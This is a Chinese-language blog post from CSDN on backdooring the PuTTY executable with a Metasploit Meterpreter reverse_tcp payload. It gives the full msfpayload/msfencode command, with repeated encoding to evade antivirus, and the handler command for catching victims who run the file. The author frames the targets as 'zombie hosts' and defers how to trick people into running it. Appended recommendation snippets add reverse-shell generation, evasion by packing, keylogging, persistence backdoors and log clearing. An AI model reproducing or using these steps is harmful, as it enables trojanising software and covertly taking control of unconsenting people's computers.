meterpreter的攻击载荷使用

最新推荐文章于 2024-07-12 02:56:00 发布
最新推荐文章于 2024-07-12 02:56:00 发布
阅读量2.8k 收藏 1
点赞数 1
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangxiaohuzi/article/details/18404249
版权

meterpreter号称是metasploit里面最牛逼的模块,今天我就使用了一下,下面记录一下过程。我这次试验的主要目的是,把能用的攻击载荷绑定到Putty程序上,当受攻击者打开Putty程序之后,我再通过命令将木马线程迁移到一个不会关闭的进程上,如explorer.exe.然后我就能保证木马进程持续不衰地为我服务了,至于怎么诱导人打开,还有怎么使用这个进程,这是后话,还需要进行后面命令的处理。我先记录目前完成的步骤。

  1. 首先,载入此次所需要用到的攻击载荷:

    root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp O

在这里,要说明的是,我已经把putty.exe的文件拷入到/root/example_01下了(我这里改名为putty_02.exe,其实都一样)。而且操作也是在此文件夹下执行。


2.下一步就是要将攻击载荷植入这个putty_02.exe文件当中,这样它才能产生作用,在执行命令的同时,需要进行相关设置,以便于在执行之后,能向LHOST机器回传信息:

root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=80 R | msfencode -t exe -x /root/example_01/putty_02.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5

使用以上命令,设置攻击机为我的主机:192.168.17.135,使用端口为80,然后将植入后的文件生成为putty_backdoor.exe。

可见,执行成功,攻击载荷成功植入putty_backdoor.exe

将这个putty程序拷贝出虚拟机,然后具体怎么让别人使用,那就是后话了。


3.使用msfcli模式打开那个载荷的坚挺进程,等待有人上钩:

root@bt:/pentest/exploits/framework3# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=80 E

此时,如果在某台肉鸡上面有人点击了你的putty程序,就会有如下状况:


4.至此,彻底进入meterpreter状态。可以利用后面的方法进行控制了。例如,输入shell.获取肉鸡控制。


u013498705
关注
专栏目录
《WEB安全渗透测试》(20)payload攻击载荷
午夜安全
08-23 9267
《WEB安全渗透测试》(20)payload攻击载荷 payload称为攻击载荷,主要用于建立目标机与攻击机之间的稳定连接,并返回一个shell,也可以进行程序注入等。(1)singles(独立载荷)独立载荷,可直接植入目标系统并执行相应的程序,如:shell_bind_tcp。(2)stagers(传输器载荷)传输器载荷,用于目标机与攻击机之间建立稳定的网络连接,与stages(传输体载荷)配合攻击。通常该种载荷体积都非常小,可以在漏洞利用后,方便进行注入,这类载荷功能都非常相似...
metasploit学习之路(三) exploit+payload攻击载荷+metepreter(介绍)
Sea_Sand息禅
07-07 2275
一、exploit介绍 exploit是利用漏洞对目标进行攻击的模块,通过信息的手机及漏洞的验证等,使用相应的exploit对目标机进行漏洞攻击。也就是我么常说的漏洞利用exp。 exploit可有主动和被动两种。 主动:利用合适的exploit对目标机进行攻击 被动:类似于钓鱼,等待用户对我们的诱饵链接等进行操作我们才能攻击成功。 二、payload介绍 payload是msf生成的有效载荷,可...
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3905
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   MeterpreterMetasploit 框架中的一...
Meterpreter 是一种 Metasploit 攻击负载
最新发布
weixin_40919176的博客
07-12 26
Meterpreter 是一种 Metasploit 攻击负载,它提供了一个交互式 shell,攻击者可以通过该 shell 探索目标机器并执行代码。Meterpreter 使用内存中 DLL 注入进行部署。因此,Meterpreter 完全驻留在内存中,不会将任何内容写入磁盘。Meterpreter 将自身注入受感染的进...
攻击载荷、木马、蠕虫、感染型病毒,你了解多少?
qq_32044265的博客
07-18 1298
恶意程序是指数字世界中带有攻击意图的程序实体,通常可以分为攻击载荷、木马、蠕虫、感染型病毒。除此之外,还有一类最难清除的病毒,业内通常命名为Rootkit、Bootkit。
【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 7779
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
《Web安全之深度学习实战》笔记:第十二章 智能扫描器(1) XSS攻击载荷
mooyuan的博客
03-12 4408
别看本小节的标题较为炫酷,实际上是这就是通过让机器通过学习攻击样本,自动生成XSS攻击载荷,与本书第三章中使用的SequenceGenerator原理相同,具体可参考我之前的笔记。 《Web安全之深度学习实战》笔记:第三章 循环神经网络_mooyuan的博客-CSDN博客 一、扫描器 漏洞扫描主要就是基于扫描器,扫描器是安全领域非常重要的一个工具,大多数安全公司都会有自己的扫描器产品。扫描器的原理非常简单,如图12-1所示,扫描器通过对目标网站发送攻击请求,根据应答内容判断是否存在漏洞,整个过程就是模
Metasploit-payload(攻击载荷)
y@n1n的博客
03-05 1291
payload模块的类型:Single、Stager、Stage。 singles(独立载荷) Single是一种完全独立的Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。 stagers(传输器载荷) Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stage.
0x04.第四课 Meterpreter的介绍与使用.pdf
06-24
MeterpreterMetasploit框架中的一个重要组成部分,作为攻击载荷使用,在成功利用漏洞后能够为攻击者提供对目标系统的控制通道。这一模块允许攻击者执行一系列操作,如信息收集、权限提升、文件管理等。 #### 二、...
【网络安全meterpreter攻击实战
茗染云华 荆挑赋樱
11-30 1164
【正确】msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f exe > shell.exe。【正确】msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f elf > shell。
ms17-010 永恒之蓝
qq_62803993的博客
01-12 4532
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
metasploit常用命令
Johnathan的博客
03-03 557
metasploit常用命令 service apache2 start service postgresql start msfconsole启动 1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。
msf攻击载荷生成
我还在的博客
10-06 1695
msf攻击载荷生成器0x00 前言0x01 拓扑结构0x02 过程1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成生成木马过程 0x00 前言 这是我对 msf攻击载荷生成器的学习记录。 0x01 拓扑结构 0x02 过程 1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成生成木马过程 1.1 显示msfpayload命令的使用方法:msfp...
使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
渗透测试
06-06 7559
文章目录前言一、免杀1.msfvenom的使用2.多重编码二、加壳1.upx的使用总结 前言 本文详细介绍了使用Metasploit创建攻击载荷使用攻击载荷生成器msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件 一、免杀 免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描 1.msfvenom的使用 ┌──(root????kali)-[~] └─# msfvenom info
metasploit 使用教程
热门推荐
jiangliuzheng的专栏
01-20 10万+
METASPLOIT基础入门 1、基础知识 1.1 简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasp
对msf生成攻击载荷进行免杀处理
Solar's Blog
04-30 3699
使用MSF编码器避免被查杀的最佳方法之一就是使用MSF编码器(集成入msfvenom功能程序)对我们要生成攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序功能不会受到任何影响。和电子邮件附件使用Base64重新编码类似,MSF编码器将原始的可执行程序进行编码,并生成一个新的二进制文件。当这个文件运行后,MSF编码器...
永恒之蓝漏洞利用及攻击
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
渗透攻防工具篇-后渗透阶段的Meterpreter
qdslg的专栏
07-29 4326
文章作者  zusheng 文章来源  i春秋原创奖励计划 时间        2016年8月23日 14:38:43 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter 1.1、什么是Meterpret...
meterpreter详细教程
06-09
MeterpreterMetasploit 框架中最常用的 payload(载荷)之一,它提供了一个强大的交互式 shell,可以用于远程控制受感染的主机。下面是一些关于 Meterpreter 的详细教程: 1. 获取 Meterpreter Shell 在 Metasploit 框架中选择一个适当的 exploit,成功获取目标机器的 shell 后,可以使用 Meterpreter payload,使用命令 `use payload/windows/meterpreter/reverse_tcp` 或 `use payload/linux/x86/meterpreter/reverse_tcp`。 2. 基本命令 Meterpreter 支持许多命令,可以使用 `help` 命令查看所有可用的命令。以下是一些常用命令: - `sysinfo`:显示目标系统的基本信息。 - `getuid`:显示当前用户的权限。 - `getsystem`:尝试提升当前用户的权限到系统管理员。 - `ps`:显示当前系统上正在运行的进程。 - `shell`:在目标机器上打开一个交互式 shell。 - `upload`:将本地文件上传到目标机器。 - `download`:将目标机器上的文件下载到本地。 3. 搜索敏感数据 Meterpreter 可以搜索目标机器上的敏感数据,例如密码和敏感文件。使用 `search` 命令,例如 `search -f password.txt`,可以搜索目标机器上所有包含 `password.txt` 的文件。 4. 捕获屏幕截图 Meterpreter 可以通过 `screenshot` 命令捕获目标机器的屏幕截图,并将其保存到攻击者的机器上。 5. 捕获键盘记录 Meterpreter 还可以通过 `keyscan_start` 和 `keyscan_dump` 命令捕获目标机器上的键盘记录。 6. 清除痕迹 Meterpreter 可以通过 `clean_up` 命令清除在目标机器上留下的痕迹,包括删除 Meterpreter 进程、清除日志文件等。 7. 持久化 Meterpreter 还可以通过 `run persistence` 命令在目标机器上创建一个持久化后门,以便攻击者可以在目标机器上保持访问权限。 以上是一些关于 Meterpreter 的基本教程,希望对您有所帮助。但请注意,任何未经授权的攻击行为都是违法的。如果您想学习网络安全,请遵守法律法规,不要进行任何非法活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值